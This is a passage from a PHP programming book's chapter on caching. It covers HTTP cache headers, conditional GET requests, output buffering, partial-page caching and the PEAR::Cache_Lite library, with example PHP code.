      the power to bark “Denied” at those that shouldn’t be in restricted areas, and roll
      out the red carpet for those that should. Can you feel the warm glow of power
      gathering within you? Will you use it for good—or evil? Either way, I hope you’ve
      enjoyed it and learned a bit along the way.
11
                                     Chapter




Caching
In the good old days when building web sites was as easy as knocking up a few
HTML pages, the delivery of a web page to a browser was a simple matter of having
the web server fetch a file. A site’s visitors would see its small, text-only pages almost
immediately, unless they were using particularly slow modems. Once the page was
downloaded, the browser would cache it somewhere on the local computer so that,
should the page be requested again, after performing a quick check with the server
to ensure the page hadn’t been updated, the browser could display the locally cached
version. Pages were served as quickly and efficiently as possible, and everyone was
happy.

Then dynamic web pages came along and spoiled the party by introducing two
problems:

■	 When a request for a dynamic web page is received by the server, some interme­
   diate processing must be completed, such as the execution of scripts by the PHP
   engine. This processing introduces a delay before the web server begins to deliver
   the output to the browser. This may not be a significant delay where simple PHP
   scripts are concerned, but for a more complex application, the PHP engine may
   have a lot of work to do before the page is finally ready for delivery. This extra
364   The PHP Anthology

         work results in a noticeable time lag between the user’s requests and the actual
         display of pages in the browser.

      ■	 A typical web server, such as Apache, uses the time of file modification to inform
         a web browser of a requested page’s age, allowing the browser to take appropriate
         caching action. With dynamic web pages, the actual PHP script may change only
         occasionally; meanwhile, the content it displays, which is often fetched from a
         database, will change frequently. The web server has no way of discerning up­
         dates to the database, so it doesn’t send a last modified date. If the client (that
         is, the user’s browser) has no indication of how long the data will remain valid,
         it will take a guess. This is problematic if the browser decides to use a locally
         cached version of the page which is now out of date, or if the browser decides
         to request from the server a fresh copy of the page, which actually has no new
         content, making the request redundant. The web server will always respond
         with a freshly constructed version of the page, regardless of whether or not the
         data in the database has actually changed.

         To avoid the possibility of a web site visitor viewing out-of-date content, most
         web developers use a meta tag or HTTP headers to tell the browser never to use
         a cached version of the page. However, this negates the web browser’s natural
         ability to cache web pages, and entails some serious disadvantages. For example,
         the content delivered by a dynamic page may only change once a day, so there’s
         certainly a benefit to be gained by having the browser cache a page—even if only
         for 24 hours.

      If you’re working with a small PHP application, it’s usually possible to live with
      both issues. But as your site increases in complexity—and attracts more
      traffic—you’ll begin to run into performance problems. Both these issues can be
      solved, however: the first with server-side caching; the second, by taking control
      of client-side caching from within your application. The exact approach you use to
      solve these problems will depend on your application, but in this chapter, we’ll
      consider both PHP and a number of class libraries from PEAR as possible panaceas
      for your web page woes.

      Note that in this chapter’s discussions of caching, we’ll look at only those solutions
      that can be implemented in PHP. For a more general introduction, the definitive
Caching     365

discussion of web caching is represented by Mark Nottingham’s tutorial.1 Further­
more, the solutions in this chapter should not be confused with some of the script
caching solutions that work on the basis of optimizing and caching compiled PHP
scripts, such as Zend Accelerator2 and ionCube PHP Accelerator.3


How do I prevent web

browsers from caching a page?

If timely information is crucial to your web site and you wish to prevent out-of-date
content from ever being visible, you need to understand how to prevent web
browsers—and proxy servers—from caching pages in the first place.

Solutions
There are two possible approaches we could take to solving this problem: using
HTML meta tags, and using HTTP headers.

Using HTML Meta Tags
The most basic approach to the prevention of page caching is one that utilizes HTML
meta tags:

    <meta http-equiv="expires" content="Mon, 26 Jul 1997 05:00:00 GMT"/>

    <meta http-equiv="pragma" content="no-cache" />



The insertion of a date that’s already passed into the Expires meta tag tells the
browser that the cached copy of the page is always out of date. Upon encountering
this tag, the browser usually won’t cache the page. Although the Pragma: no-cache
meta tag isn’t guaranteed, it’s a fairly well-supported convention that most web
browsers follow. However, the two issues associated with this approach, which
we’ll discuss below, may prompt you to look at the alternative solution.

Using HTTP Headers
A better approach is to use the HTTP protocol itself, with the help of PHP’s header
function, to produce the equivalent of the two HTML meta tags above:

1
  http://www.mnot.net/cache_docs/
2
  http://www.zend.com/
3
  http://www.php-accelerator.co.uk/
366   The PHP Anthology


          <?php

            header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');

            header('Pragma: no-cache');

          ?>



      We can go one step further than this, using the Cache-Control header that’s suppor­
      ted by HTTP 1.1-capable browsers:

          <?php

            header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');

            header('Cache-Control: no-store, no-cache, must-revalidate');

            header('Cache-Control: post-check=0, pre-check=0', FALSE);

            header('Pragma: no-cache');

          ?>



      For a precise description of HTTP 1.1 Cache-Control headers, have a look at the
      W3C’s HTTP 1.1 RFC.4 Another great source of information about HTTP headers,
      which can be applied readily to PHP, is mod_perl’s documentation on issuing correct
      headers.5

      Discussion
      Using the Expires meta tag sounds like a good approach, but two problems are as­
      sociated with it:

      ■	 The browser first has to download the page in order to read the meta tags. If a
         tag wasn’t present when the page was first requested by a browser, the browser
         will remain blissfully ignorant and keep its cached copy of the original.

      ■	 Proxy servers that cache web pages, such as those common to ISPs, generally
         won’t read the HTML documents themselves. A web browser might know that
         it shouldn’t cache the page, but the proxy server between the browser and the
         web server probably doesn’t—it will continue to deliver the same out-of-date
         page to the client.

      On the other hand, using the HTTP protocol to prevent page caching essentially
      guarantees that no web browser or intervening proxy server will cache the page, so


      4
          http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9
      5
          http://perl.apache.org/docs/general/correct_headers/correct_headers.html
Caching      367

visitors will always receive the latest content. In fact, the first header should accom­
plish this on its own; this is the best way to ensure a page is not cached. The Cache-
Control and Pragma headers are added for some degree of insurance. Although they
don’t work on all browsers or proxies, the Cache-Control and Pragma headers will
catch some cases in which the Expires header doesn’t work as intended—if the
client computer’s date is set incorrectly, for example.

Of course, to disallow caching entirely introduces the problems we discussed at
the start of this chapter: it negates the web browser’s natural ability to cache pages,
and can create unnecessary overhead, as new versions of pages are always requested,
even though those pages may not have been updated since the browser’s last request.
We’ll look at the solution to these issues in just a moment.


How do I control client-side caching?
We addressed the task of disabling client-side caching in “How do I prevent web
browsers from caching a page?”, but disabling the cache is rarely the only (or best)
option.

Here we’ll look at a mechanism that allows us to take advantage of client-side caches
in a way that can be controlled from within a PHP script.


       Apache Required!
      This approach will only work if you’re running PHP as an Apache web server
      module, because it requires use of the function getallheaders—which only
      works with Apache—to fetch the HTTP headers sent by a web browser.


Solutions
In controlling client-side caching you have two alternatives. You can set a date on
which the page will expire, or respond to the browser’s request headers. Let’s see
how each of these tactics is executed.

Setting a Page Expiry Header
The header that’s easiest to implement is the Expires header—we use it to set a
date on which the page will expire, and until that time, web browsers are allowed
to use a cached version of the page. Here’s an example of this header at work:
368   The PHP Anthology

                                                                       expires.php (excerpt)

       <?php
       function setExpires($expires) {
         header(
             'Expires: '.gmdate('D, d M Y H:i:s', time()+$expires).'GMT');
       }
       setExpires(10);
       echo ( 'This page will self destruct in 10 seconds<br />' );
       echo ( 'The GMT is now '.gmdate('H:i:s').'<br />' );
       echo ( '<a href="'.$_SERVER['PHP_SELF'].'">View Again</a><br />' );
       ?>



      In this example, we created a custom function called setExpires that sets the HTTP
      Expires header to a point in the future, defined in seconds. The output of the above
      example shows the current time in GMT, and provides a link that allows us to view
      the page again. If we follow this link, we’ll notice the time updates only once every
      ten seconds. If you like, you can also experiment by using your browser’s Refresh
      button to tell the browser to refresh the cache, and watching what happens to the
      displayed date.

      Acting on the Browser’s Request Headers
      A more useful approach to client-side cache control is to make use of the Last-
      Modified and If-Modified-Since headers, both of which are available in HTTP
      1.0. This action is known technically as performing a conditional GET request;
      whether your script returns any content depends on the value of the incoming If-
      Modified-Since request header.

      If you use PHP version 4.3.0 and above on Apache, the HTTP headers are accessible
      with the functions apache_request_headers and apache_response_headers. Note
      that the function getallheaders has become an alias for the new
      apache_request_headers function.

      This approach requires that you send a Last-Modified header every time your PHP
      script is accessed. The next time the browser requests the page, it sends an If-
      Modified-Since header containing a time; your script can then identify whether
      the page has been updated since that time. If it hasn’t, your script sends an HTTP
      304 status code to indicate that the page hasn’t been modified, and exits before
      sending the body of the page.
Caching     369

Let’s see these headers in action. The example below uses the modification date of
a text file. To simulate updates, we first need to create a way to randomly write to
the file:

                                                               ifmodified.php (excerpt)

 <?php
 $file = 'ifmodified.txt';
 $random = array (0,1,1);
 shuffle($random);
 if ( $random[0] == 0 ) {
   $fp = fopen($file, 'w');
   fwrite($fp, 'x');
   fclose($fp);
 }
 $lastModified = filemtime($file);



Our simple randomizer provides a one-in-three chance that the file will be updated
each time the page is requested. We also use the filemtime function to obtain the
last modified time of the file.

Next, we send a Last-Modified header that uses the modification time of the text
file. We need to send this header for every page we render, to cause visiting browsers
to send us the If-Modifed-Since header upon every request:

                                                               ifmodified.php (excerpt)

 header('Last-Modified: ' .
     gmdate('D, d M Y H:i:s', $lastModified) . ' GMT');



Our use of the getallheaders function ensures that PHP gives us all the incoming
request headers as an array. We then need to check that the If-Modified-Since
header actually exists; if it does, we have to deal with a special case caused by older
Mozilla browsers (earlier than version 6), which appended an illegal extra field to
their If-Modified-Since headers. We use PHP’s strtotime function to generate a
timestamp from the date the browser sent us. If there’s no such header, we set this
timestamp to zero, which forces PHP to give the visitor an up-to-date copy of the
page:
370   The PHP Anthology

                                                                   ifmodified.php (excerpt)

       $request = getallheaders();
       if (isset($request['If-Modified-Since']))
       {
         $modifiedSince = explode(';', $request['If-Modified-Since']);
         $modifiedSince = strtotime($modifiedSince[0]);
       }
       else
       {
         $modifiedSince = 0;
       }



      Finally, we check to see whether or not the cache has been modified since the last
      time the visitor received this page. If it hasn’t, we simply send a 304 Not Modified
      response header and exit the script, saving bandwidth and processing time by
      prompting the browser to display its cached copy of the page:

                                                                   ifmodified.php (excerpt)

       if ($lastModified <= $modifiedSince)
       {
         header('HTTP/1.1 304 Not Modified');
         exit();
       }

       echo ( 'The GMT is now '.gmdate('H:i:s').'<br />' );
       echo ( '<a href="'.$_SERVER['PHP_SELF'].'">View Again</a><br />' );
       ?>



      Remember to use the “View Again” link when you run this example (clicking the
      Refresh button usually clears your browser’s cache). If you click on the link re­
      peatedly, the cache will eventually be updated; your browser will throw out its
      cached version and fetch a new page from the server.

      If you combine the Last-Modified header approach with time values that are already
      available in your application—for example, the time of the most recent news art­
      icle—you should be able to take advantage of web browser caches, saving bandwidth
      and improving your application’s perceived performance in the process.
Caching      371

Be very careful to test any caching performed in this manner, though; if you get it
wrong, you may cause your visitors to consistently see out-of-date copies of your
site.

Discussion
HTTP dates are always calculated relative to Greenwich Mean Time (GMT). The
PHP function gmdate is exactly the same as the date function, except that it auto­
matically offsets the time to GMT based on your server’s system clock and regional
settings.

When a browser encounters an Expires header, it caches the page. All further re­
quests for the page that are made before the specified expiry time use the cached
version of the page—no request is sent to the web server. Of course, client-side
caching is only truly effective if the system time on the computer is accurate. If the
computer’s time is out of sync with that of the web server, you run the risk of pages
either being cached improperly, or never being updated.

The Expires header has the advantage that it’s easy to implement; in most cases,
however, unless you’re a highly organized person, you won’t know exactly when
a given page on your site will be updated. Since the browser will only contact the
server after the page has expired, there’s no way to tell browsers that the page they’ve
cached is out of date. In addition, you also lose some knowledge of the traffic visiting
your web site, since the browser will not make contact with the server when it re­
quests a page that’s been cached.


How do I examine HTTP
headers in my browser?
How can you actually check that your application is running as expected, or debug
your code, if you can’t actually see the HTTP headers? It’s worth knowing exactly
which headers your script is sending, particularly when you’re dealing with HTTP
cache headers.

Solution
Several worthy tools are available to help you get a closer look at your HTTP
headers:
372   The PHP Anthology

      LiveHTTPHeaders (http://livehttpheaders.mozdev.org/)
          This add-on to the Firefox browser is a simple but very handy tool for examining
          request and response headers while you’re browsing.

      Firebug (http://getfirebug.org/)
          Another useful Firefox add-on, Firebug is a tool whose interface offers a dedic­
          ated tab for examining HTTP request information.

      HTTPWatch (http://www.httpwatch.com/)
         This add-on to Internet Explorer for HTTP viewing and debugging is similar to
         LiveHTTPHeaders above.

      Charles Web Debugging Proxy (http://getcharles.com/)
         Available for Windows, Mac OS X, and Linux or Unix, the Charles Web Debug­
         ging Proxy is a proxy server that allows developers to see all the HTTP traffic
         between their browsers and the web servers to which they connect.

      Any of these tools will allow you to inspect the communication between the server
      and browser.


      How do I cache file downloads
      with Internet Explorer?
      If you’re developing file download scripts for Internet Explorer users, you might
      notice a few issues with the download process. In particular, when you’re serving
      a file download through a PHP script that uses headers such as Content-Disposi­
      tion: attachment, filename=myFile.pdf or Content-Disposition: inline,
      filename=myFile.pdf, and that tells the browser not to cache pages, Internet Ex­
      plorer won’t deliver that file to the user.

      Solutions
      Internet Explorer handles downloads in a rather unusual manner: it makes two re­
      quests to the web site. The first request downloads the file and stores it in the cache
      before making a second request, the response to which is not stored. The second
      request invokes the process of delivering the file to the end user in accordance with
      the file’s type—for instance, it starts Acrobat Reader if the file is a PDF document.
      Therefore, if you send the cache headers that instruct the browser not to cache the
Caching      373

page, Internet Explorer will delete the file between the first and second requests,
with the unfortunate result that the end user receives nothing!

If the file you’re serving through the PHP script won’t change, one solution to this
problem is simply to disable the “don’t cache” headers, pragma and cache-control,
which we discussed in “How do I prevent web browsers from caching a page?”, for
the download script.

If the file download will change regularly, and you want the browser to download
an up-to-date version of it, you’ll need to use the Last-Modified header that we
met in “How do I control client-side caching?”, and ensure that the time of modific­
ation remains the same across the two consecutive requests. You should be able to
achieve this goal without affecting users of browsers that handle downloads correctly.

One final solution is to write the file to the file system of your web server and simply
provide a link to it, leaving it to the web server to report the cache headers for you.
Of course, this may not be a viable option if the file is supposed to be secured.


How do I use output buffering
for server-side caching?
Server-side processing delay is one of the biggest bugbears of dynamic web pages.
We can reduce server-side delay by caching output. The page is generated normally,
performing database queries and so on with PHP; however, before sending it to the
browser, we capture and store the finished page somewhere—in a file, for instance.
The next time the page is requested, the PHP script first checks to see whether a
cached version of the page exists. If it does, the script sends the cached version
straight to the browser, avoiding the delay involved in rebuilding the page.

Solution
Here, we’ll look at PHP’s in-built caching mechanism, the output buffer, which can
be used with whatever page rendering system you prefer (templates or no templates).
Consider situations in which your script displays results using, for example, echo
or print, rather than sending the data directly to the browser. In such cases, you
can use PHP’s output control functions to store the data in an in-memory buffer,
which your PHP script has both access to and control over.
374   The PHP Anthology

      Here’s a simple example that demonstrates how the output buffer works:

                                                                         buffer.php (excerpt)

       <?php
       ob_start();
       echo '1. Place this in the buffer<br />';
       $buffer = ob_get_contents();
       ob_end_clean();
       echo '2. A normal echo<br />';
       echo $buffer;
       ?>



      The buffer itself stores the output as a string. So, in the above script, we commence
      buffering with the ob_start function, and use echo to display a piece of text which
      is stored in the output buffer automatically. We then use the ob_get_contents
      function to fetch the data the echo statement placed in the buffer, and store it in
      the $buffer variable. The ob_end_clean function stops the output buffer and
      empties the contents; the alternative approach is to use the ob_end_flush function,
      which displays the contents of the buffer.

      The above script displays the following output:

       2. A normal echo

       1. Place this in the buffer



      In other words, we captured the output of the first echo, then sent it to the browser
      after the second echo. As this simple example suggests, output buffering can be a
      very powerful tool when it comes to building your site; it provides a solution for
      caching, as we’ll see in a moment, and is also an excellent way to hide errors from
      your site’s visitors, as is discussed in Chapter 9. Output buffering even provides a
      possible alternative to browser redirection in situations such as user authentication.

      In order to improve the performance of our site, we can store the output buffer
      contents in a file. We can then call on this file for the next request, rather than
      having to rebuild the output from scratch again. Let’s look at a quick example of
      this technique. First, our example script checks for the presence of a cache file:
Caching     375

                                                                   sscache.php (excerpt)

 <?php
 if (file_exists('./cache/page.cache'))
 {
   readfile('./cache/page.cache');
   exit();
 }



If the script finds the cache file, we simply output its contents and we’re done!


If the cache file is not found, we proceed to output the page using the output buffer:


                                                                   sscache.php (excerpt)

 ob_start();
 ?>
 <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
     <title>Cached Page</title>
   </head>
   <body>
     This page was cached with PHP's
     <a href="http://www.php.net/outcontrol"
         >Output Control Functions</a>
   </body>
 </html>
 <?php
 $buffer = ob_get_contents();
 ob_end_flush();



Before we flush the output buffer to display our page, we make sure to store the
buffer contents in the $buffer variable.

The final step is to store the saved buffer contents in a text file:
376   The PHP Anthology

                                                                      sscache.php (excerpt)

          $fp = fopen('./cache/page.cache','w');
          fwrite($fp,$buffer);
          fclose($fp);
          ?>



      The page.cache file contents are exactly same as the HTML that was rendered by
      the script:

                                                                 cache/page.cache (excerpt)

          <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
            "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
          <html xmlns="http://www.w3.org/1999/xhtml">
            <head>
              <title>Cached Page</title>
            </head>
            <body>
              This page was cached with PHP's
              <a href="http://www.php.net/outcontrol"
                  >Output Control Functions</a>
            </body>
          </html>



      Discussion
      For an example that shows how to use PHP’s output buffering capabilities to handle
      errors more elegantly, have a look at the PHP Freaks article “Introduction to Output
      Buffering,” by Derek Ford.6

      What About Template Caching?
      Template engines often include template caching features—Smarty is a case in
      point.7 Usually, these engines offer a built-in mechanism for storing a compiled
      version of a template (that is, the native PHP generated from the template), which
      prevents us developers from having to recompile the template every time a page is
      requested.


      6
          http://www.phpfreaks.com/tutorials/59/0.php
      7
          http://smarty.php.net/
Caching   377

This process should not be confused with output—or content—caching, which
refers to the caching of the rendered HTML (or other output) that PHP sends to the
browser. In addition to the content cache mechanisms discussed in this chapter,
Smarty can cache the contents of the HTML page. Whether you use Smarty’s content
cache or one of the alternatives discussed in this chapter, you can successfully use
both template and content caching together on the same site.

HTTP Headers and Output Buffering
Output buffering can help solve the most common problem associated with the
header function, not to mention the issues surrounding session_start and
set_cookie. Normally, if you call any of these functions after page output has begun,
you’ll get a nasty error message. When output buffering’s turned on, the only output
types that can escape the buffer are HTTP headers. If you use ob_start at the very
beginning of your application’s execution, you can send headers at whichever point
you like, without encountering the usual errors. You can then write out the buffered
page content all at once, when you’re sure that no more HTTP headers are required.


       Use Output Buffering Responsibly
      While output buffering can helpfully solve all our header problems, it should
      not be used solely for that reason. By ensuring that all output is generated after
      all the headers are sent, you’ll save the time and resource overheads involved in
      using output buffers.



How do I cache just the parts of
a page that change infrequently?
Caching an entire page is a simplistic approach to output buffering. While it’s easy
to implement, that approach negates the real benefits presented by PHP’s output
control functions to improve your site’s performance in a manner that’s relevant to
the varying lifetimes of your content.

No doubt, some parts of the page that you send to visitors will change very rarely,
such as the page’s header, menus, and footer. But other parts—for example, the list
of comments on your blog posts—may change quite often. Fortunately, PHP allows
you to cache sections of the page separately.
378   The PHP Anthology


      Solution
      Output buffering can be used to cache sections of a page in separate files. The page
      can then be rebuilt for output from these files.

      This technique eliminates the need to repeat database queries, while loops, and so
      on. You might consider assigning each block of the page an expiry date after which
      the cache file is recreated; alternatively, you may build into your application a
      mechanism that deletes the cache file every time the content it stores is changed.

      Let’s work through an example that demonstrates the principle. Firstly, we’ll create
      two helper functions, writeCache and readCache. Here’s the writeCache function:

                                                                     smartcache.php (excerpt)

       <?php
         function writeCache($content, $filename)
         {
           $fp = fopen('./cache/' . $filename, 'w');
           fwrite($fp, $content);
           fclose($fp);
         }



      The writeCache function is quite simple; it just writes the content of the first argu­
      ment to a file with the name specified in the second argument, and saves that file
      to a location in the cache directory. We’ll use this function to write our HTML to
      the cache files.

      The readCache function will return the contents of the cache file specified in the
      first argument if it has not expired—that is, the file’s last modified time is not older
      than the current time minus the number of seconds specified in the second argument.
      If it has expired or the file does not exist, the function returns false:

                                                                     smartcache.php (excerpt)

         function readCache($filename, $expiry)
         {
           if (file_exists('./cache/' . $filename))
           {
             if ((time() - $expiry) > filemtime('./cache/' . $filename))
             {
Caching     379


         return false;

       }

       $cache = file('./cache/' . $filename);

       return implode('', $cache);

     }

     return false;

   }




For the purposes of demonstrating this concept, I’ve used a procedural approach.
However, I wouldn’t recommend doing this in practice, as it will result in very
messy code and is likely to cause issues with file locking. For example, what happens
when someone accesses the cache at the exact moment it’s being updated? Better
solutions will be explained later on in the chapter.

Let’s continue this example. After the output buffer is started, processing begins.
First, the script calls readCache to see whether the file header.cache exists; this
contains the top of the page—the HTML <head> tag and the start <body> tag. We’ve
used PHP’s date function to display the time at which the page was actually
rendered, so you’ll be able to see the different cache files at work when the page is
displayed:

                                                             smartcache.php (excerpt)

   ob_start();
   if (!$header = readCache('header.cache', 604800))
   {
 ?>
 <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
     <title>Chunked Cached Page</title>
     <meta http-equiv="Content-Type"
         content="text/html; charset=iso-8859-1"/>
   </head>
   <body>
     <p>The header time is now: <?php echo date('H:i:s'); ?></p>
 <?php
     $header = ob_get_contents();
380   The PHP Anthology


           ob_clean();

           writeCache($header,'header.cache');

         }




      Note what happens when a cache file isn’t found: the header content is output and
      assigned to a variable, $header, with ob_get_contents, after which the ob_clean
      function is called to empty the buffer. This allows us to capture the output in
      “chunks” and assign them to individual cache files with the writeCache function.
      The header of the page is now stored as a file, which can be reused without our
      needing to rerender the page. Look back to the start of the if condition for a moment.
      When we called readCache, we gave it an expiry time of 604800 seconds (one week);
      readCache uses the file modification time of the cache file to determine whether
      the cache is still valid.

      For the body of the page, we’ll use the same process as before. However, this time,
      when we call readCache, we’ll use an expiry time of five seconds; the cache file
      will be updated whenever it’s more than five seconds old:

                                                                    smartcache.php (excerpt)

         if (!$body = readCache('body.cache', 5))
         {
           echo 'The body time is now: ' . date('H:i:s') . '<br />';
           $body = ob_get_contents();
           ob_clean();
           writeCache($body, 'body.cache');
         }



      The page footer is effectively the same as the header. After the footer, the output
      buffering is stopped and the contents of the three variables that hold the page data
      are displayed:

                                                                    smartcache.php (excerpt)

         if (!$footer = readCache('footer.cache', 604800)) {
       ?>
           <p>The footer time is now: <?php echo date('H:i:s'); ?></p>
         </body>
       </html>
Caching     381


 <?php

     $footer = ob_get_contents();

     ob_clean();

     writeCache($footer, 'footer.cache');

   }

   ob_end_clean();


   echo $header . $body . $footer;

 ?>




The end result looks like this:

 The header time is now: 17:10:42

 The body time is now: 18:07:40

 The footer time is now: 17:10:42



The header and footer are updated on a weekly basis, while the body is updated
whenever it is more than five seconds old. If you keep refreshing the page, you’ll
see the body time updating.

Discussion
Note that if you have a page that builds content dynamically, based on a number
of variables, you’ll need to make adjustments to the way you handle your cache
files. For example, you might have an online shopping catalog whose listing pages
are defined by a URL such as:

http://example.com/catalogue/view.php?category=1&page=2

This URL should show page two of all items in category one; let’s say this is the
category for socks. But if we were to use the caching code above, the results of the
first page of the first category we looked at would be cached, and shown for any
request for any other page or category, until the cache expiry time elapsed. This
would certainly confuse the next visitor who wanted to browse the category for
shoes—that person would see the cached content for socks!

To avoid this issue, you’ll need to incorporate the category ID and page number in
to the cache file name like so:
382   The PHP Anthology


               $cache_filename = 'catalogue_' . $category_id . '_' .

                    $page . '.cache';

               if (!$catalogue = readCache($cache_filename, 604800))

               {

                  ⋮ display the category HTML…
               }



      This way, the correct cached content can be retrieved for every request.


                 Nesting Buffers
               You can nest one buffer within another practically ad infinitum simply by calling
               ob_start more than once. This can be useful if you have multiple operations
               that use the output buffer, such as one that catches the PHP error messages, and
               another that deals with caching. Care needs to be taken to make sure that
               ob_end_flush or ob_end_clean is called every time ob_start is used.



      How do I use PEAR::Cache_Lite
      for server-side caching?
      The previous solution explored the ideas behind output buffering using the PHP
      ob_* functions. Although we mentioned at the time, that approach probably isn’t
      the best way to meet to dual goals of keeping your code maintainable and having a
      reliable caching mechanism. It’s time to see how we can put a caching system into
      action in a manner that will be reliable and easy to maintain.

      Solution
      In the interests of keeping your code maintainable and having a reliable caching
      mechanism, it’s a good idea to delegate the responsibility of caching logic to classes
      you trust. In this case, we’ll use a little help from PEAR::Cache_Lite (version 1.7.2
      is used in the examples here).8 Cache_Lite provides a solid yet easy-to-use library
      for caching, and handles issues such as: file locking; creating, checking for, and
      deleting cache files; controlling the output buffer; and directly caching the results
      from function and class method calls. More to the point, Cache_Lite should be rel­




      8
          http://pear.php.net/package/Cache_Lite/
Caching     383

atively easy to apply to an existing application, requiring only minor code modific­
ations.

Cache_Lite has four main classes. First is the base class, Cache_Lite, which deals
purely with creating and fetching cache files, but makes no use of output buffering.
This class can be used alone for caching operations in which you have no need for
output buffering, such as storing the contents of a template you’ve parsed with PHP.

The examples here will not use Cache_Lite directly, but will instead focus on the
three subclasses. Cache_Lite_Function can be used to call a function or class
method and cache the result, which might prove useful for storing a MySQL query
result set, for example. The Cache_Lite_Output class uses PHP’s output control
functions to catch the output generated by your script and store it in cache files; it
allows you to perform tasks such as those we completed in “How do I cache just
the parts of a page that change infrequently?”. The Cache_Lite_File class bases
cache expiry on the timestamp of a master file, with any cache file being deemed
to have expired if it is older than the timestamp.

Let’s work through an example that shows how you might use Cache_Lite to create
a simple caching solution. When we’re instantiating any child classes of Cache_Lite,
we must first provide an array of options that determine the behavior of Cache_Lite
itself. We’ll look at these options in detail in a moment. Note that the cacheDir
directory we specify must be one to which the script has read and write access:

                                                                cachelite.php (excerpt)

 <?php
   require_once 'Cache/Lite/Output.php';
   $options = array(
     'cacheDir' => './cache/',
     'writeControl' => 'true',
     'readControl' => 'true',
     'fileNameProtection' => false,
     'readControlType' => 'md5'
   );
   $cache = new Cache_Lite_Output($options);



For each chunk of content that we want to cache, we need to set a lifetime (in
seconds) for which the cache should live before it’s refreshed. Next, we use the
start method, available only in the Cache_Lite_Output class, to turn on output
384   The PHP Anthology

      buffering. The two arguments passed to the start method are an identifying value
      for this particular cache file, and a cache group. The group is an identifier that allows
      a collection of cache files to be acted upon; it’s possible to delete all cache files in
      a given group, for example (more on this in a moment). The start method will
      check to see if a valid cache file is available and, if so, it will begin outputting the
      cache contents. If a cache file is not available, start will return false and begin
      caching the following output.

      Once the output for this chunk has finished, we use the end method to stop buffering
      and store the content as a file:

                                                                        cachelite.php (excerpt)

         $cache->setLifeTime(604800);

         if (!$cache->start('header', 'Static')) {
       ?>
       <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
       <head>
         <title>PEAR::Cache_Lite example</title>
         <meta http-equiv="Content-Type"
             content="text/html; charset=iso-8859-1"/>
       </head>
       <body>
         <h2>PEAR::Cache_Lite example</h2>
         <p>The header time is now: <?php echo date('H:i:s'); ?></p>
       <?php
           $cache->end();
         }



      To cache the body and footer, we follow the same procedure we used for the header.
      Note that, again, we specify a five-second lifetime when caching the body:

                                                                        cachelite.php (excerpt)

         $cache->setLifeTime(5);
         if (!$cache->start('body', 'Dynamic')) {
           echo 'The body time is now: ' . date('H:i:s') . '<br />';
           $cache->end();
         }
Caching   385



   $cache->setLifeTime(604800);

   if (!$cache->start('footer', 'Static')) {

 ?>

     <p>The footer time is now: <?php echo date('H:i:s'); ?></p>

   </body>

 </html>

 <?php

     $cache->end();

   }

 ?>




On viewing the page, Cache_Lite creates cache files in the cache directory. Because
we’ve set the fileNameProtection option to false, Cache_Lite creates the files
with these names:

■ ./cache/cache_Static_header
■ ./cache/cache_Dynamic_body
■ ./cache/cache_Static_footer

You can read about the fileNameProtection option—and many more—in “What
configuration options does Cache_Lite support?”. When the same page is requested
later, the code above will use the cached file if it is valid and has not expired.


       Protect your Cache Files
     Make sure that the directory in which you place the cache files is not publicly
     available, or you may be offering your site’s visitors access to more than you
     realize.



What configuration options
does Cache_Lite support?
When instantiating Cache_Lite (or any of its subclasses, such as
Cache_Lite_Output), you can use any of a number of approaches to controlling its
behavior. These options should be placed in an array and passed to the constructor
as shown below (and in the previous section):
386   The PHP Anthology


         $options = array(

           'cacheDir' => './cache/',

           'writeControl' => true,

           'readControl' => true,

           'fileNameProtection' => false,

           'readControlType' => 'md5'

         );

         $cache = new Cache_Lite_Output($options);



      Solution
      The options available in the current version of Cache_Lite (1.7.2) are:

      cacheDir

         This is the directory in which the cache files will be placed. It defaults to /tmp/.

      caching
         This option switches on and off the caching behavior of Cache_Lite. If you have
         numerous Cache_Lite calls in your code and want to disable the cache for de­
         bugging, for example, this option will be important. The default value is true
         (caching enabled).

      lifeTime
         This option represents the default lifetime (in seconds) of cache files. It can be
         changed using the setLifeTime method. The default value is 3600 (one hour),
         and if it’s set to null, the cache files will never expire.

      fileNameProtection
         With this option activated, Cache_Lite uses an MD5 encryption hash to generate
         the filename for the cache file. This option protects you from error when you
         try to use IDs or group names containing characters that aren’t valid for file­
         names; fileNameProtection must be turned on when you use
         Cache_Lite_Function. The default is true (enabled).

      fileLocking
         This option is used to switch the file locking mechanisms on and off. The default
         is true (enabled).
Caching     387

writeControl
   This option checks that a cache file has been written correctly immediately after
   it has been created, and throws a PEAR::Error if it finds a problem. Obviously,
   this facility would allow your code to attempt to rewrite a cache file that was
   created incorrectly, but it comes at a cost in terms of performance. The default
   value is true (enabled).

readControl
   This option checks any cache files that are being read to ensure they’re not
   corrupt. Cache_Lite is able to place inside the file a value, such as the string
   length of the file, which can be used to confirm that the cache file isn’t corrupt.
   There are three alternative mechanisms for checking that a file is valid, and
   they’re specified using the readControlType option. These mechanisms come
   at the cost of performance, but should help to guarantee that your visitors aren’t
   seeing scrambled pages. The default value is true (enabled).

readControlType
   This option lets you specify the type of read control mechanism you want to
   use. The available mechanisms are a cyclic redundancy check (crc32, the default
